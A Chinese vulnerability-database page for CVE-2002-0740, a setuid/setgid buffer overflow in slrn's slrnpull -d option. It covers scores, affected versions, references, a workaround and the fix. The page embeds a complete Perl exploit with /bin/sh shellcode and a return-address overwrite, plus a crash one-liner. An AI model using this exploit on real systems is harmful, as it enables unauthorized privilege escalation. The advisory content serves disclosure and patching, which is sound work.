CVE-2002-0740
CVSS7.2
发布时间 :2002-08-12 00:00:00
修订时间 :2008-09-05 16:28:49
NMCOES    

[原文]Buffer overflow in slrnpull for the SLRN package, when installed setuid or setgid, allows local users to gain privileges via a long -d (SPOOLDIR) argument.


[CNNVD]SLRNPull Spool目录命令行参数缓冲区溢出漏洞(CNNVD-200208-016)

        
        SLRN是一款免费开放源代码的新闻阅读工具,由SLRN项目组开发和维护。可以运行在Unix和Linux操作系统下。
        SLRN对spool目录名命令行参数的边界检查不够充分,可导致攻击者进行缓冲区溢出攻击。
        lsrnpull程序默认以setuid root的属性安装,当slrnpull以-d选项执行时,攻击者可以提供超过4091字节的字符串作为spool目录名传递给-d选项,可导致缓冲溢出,精心构建字符串数据可导致获得root权限。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:slrn_development_team:slrn:0.9.6.2
cpe:/a:slrn_development_team:slrn:0.9.6.3
cpe:/a:slrn_development_team:slrn:0.9.6.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0740
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0740
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200208-016
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/4569
(VENDOR_ADVISORY)  BID  4569
http://www.iss.net/security_center/static/8910.php
(VENDOR_ADVISORY)  XF  slrnpull-d-spooldir-bo(8910)
http://online.securityfocus.com/archive/1/270235
(UNKNOWN)  BUGTRAQ  20020430 Re: Slrnpull Buffer Overflow (-d parameter)
http://online.securityfocus.com/archive/1/269667
(UNKNOWN)  BUGTRAQ  20020425 slrnpull -d PoC
http://archives.neohapsis.com/archives/bugtraq/2002-04/0302.html
(UNKNOWN)  BUGTRAQ  20020422 Slrnpull Buffer Overflow (-d parameter)

- 漏洞信息

SLRNPull Spool目录命令行参数缓冲区溢出漏洞
高危 边界条件错误
2002-08-12 00:00:00 2005-10-20 00:00:00
本地  
        
        SLRN是一款免费开放源代码的新闻阅读工具,由SLRN项目组开发和维护。可以运行在Unix和Linux操作系统下。
        SLRN对spool目录名命令行参数的边界检查不够充分,可导致攻击者进行缓冲区溢出攻击。
        lsrnpull程序默认以setuid root的属性安装,当slrnpull以-d选项执行时,攻击者可以提供超过4091字节的字符串作为spool目录名传递给-d选项,可导致缓冲溢出,精心构建字符串数据可导致获得root权限。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 使用chmod a-s命令去掉slrnpull的S属性。
        厂商补丁:
        SLRN Development Team
        ---------------------
        此漏洞已经在0.9.7.0版本中得到修补,另外由于此软件存在其他问题,维护者建议用户使用0.9.7.4版本:
        SLRN Development Team Upgrade slrn-0.9.7.4.tar.gz
        
        http://prdownloads.sourceforge.net/slrn/slrn-0.9.7.4.tar.gz

- 漏洞信息 (21408)

SLRNPull 0.9.6 Spool Directory Command Line Parameter Buffer Overflow Vulnerability (EDBID:21408)
unix local
2002-04-22 Verified
0 zillion
N/A [点击下载]
source: http://www.securityfocus.com/bid/4569/info

N is a freely available, open source news reading utility. It is developed and maintained by the SLRN project, and designed for use on various operating systems. This problem affects the UNIX and Linux implementation.

Due to a boundary condition error, a buffer overflow condition exists in spool directory names. This problem affects the slrnpull program, included as part of the slrn package. When slrnpull is executed with the -d flag, and a file name of greater than 4091 bytes, the overflow makes it possible to overwrite process memory, including the return address.

#!/bin/sh
echo DEFANGED.5
exit
#!/usr/bin/perl
#
# Credits for the vulnerability: Alex Hernandez (its setgid news not root)
# The exploit was written by:    zillion@snosoft.com / safemode.org
# http://www.safemode.org 
# http://www.snosoft.com
#
# Gain setgid news on a Red Hat 6.2 Intel box

$shellcode = 
        "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46".
        "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1".
        "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

$offset  = "-500"; 
$esp     = 0xbfffe2cc;

for ($i = 0; $i < (2041 - (length($shellcode)) - 4); $i++) {
    $buffer .= "\x90";
}

$buffer .= $shellcode;
$buffer .= pack('l', ($esp + $offset)); 

print("The new return address: 0x", sprintf('%lx',($esp + $offset)), "\n");

exec("/usr/bin/slrnpull -d '$buffer'");		

- 漏洞信息

14436
SLRN slrnpull -d Parameter Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2002-04-22 Unknow
2002-04-22 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

SLRNPull Spool Directory Command Line Parameter Buffer Overflow Vulnerability
Boundary Condition Error 4569
No Yes
2002-04-22 12:00:00 2009-07-11 12:46:00
Vulnerability discovery credited to Alex Hernandez <alex_hernandez@ureach.com>.

- 受影响的程序版本

SLRN Development Team slrn 0.9.6 .4
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.2
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
- Wirex Immunix OS 7.0 -Beta
- Wirex Immunix OS 7.0
- Wirex Immunix OS 6.2
SLRN Development Team slrn 0.9.6 .3
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Conectiva Linux 4.2
+ Conectiva Linux 4.1
+ Conectiva Linux 4.0 es
+ Conectiva Linux 4.0
+ Conectiva Linux graficas
+ Conectiva Linux ecommerce
+ MandrakeSoft Corporate Server 1.0.1
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ Mandriva Linux Mandrake 7.0
+ Mandriva Linux Mandrake 6.1
+ Mandriva Linux Mandrake 6.0
SLRN Development Team slrn 0.9.6 .2
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
SLRN Development Team slrn 0.9.7 .4
SLRN Development Team slrn 0.9.7 .3
SLRN Development Team slrn 0.9.7 .0

- 不受影响的程序版本

SLRN Development Team slrn 0.9.7 .4
SLRN Development Team slrn 0.9.7 .3
SLRN Development Team slrn 0.9.7 .0

- 漏洞讨论

SLRN is a freely available, open source news reading utility. It is developed and maintained by the SLRN project, and designed for use on various operating systems. This problem affects the UNIX and Linux implementation.

Due to a boundary condition error, a buffer overflow condition exists in spool directory names. This problem affects the slrnpull program, included as part of the slrn package. When slrnpull is executed with the -d flag, and a file name of greater than 4091 bytes, the overflow makes it possible to overwrite process memory, including the return address.

- 漏洞利用

/usr/bin/slrnpull -d `perl -e 'print "A" x 4091'`

Exploit contributed by &lt;zillion@snosoft.com&gt;:

- 解决方案

The maintainer has made it known that this issue is fixed in version 0.9.7.0. Additionally, due to other problems with the software, the maintainer has recommended the use of no release earlier than 0.9.7.3.


SLRN Development Team slrn 0.9.6 .3

SLRN Development Team slrn 0.9.6 .4

SLRN Development Team slrn 0.9.6 .2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站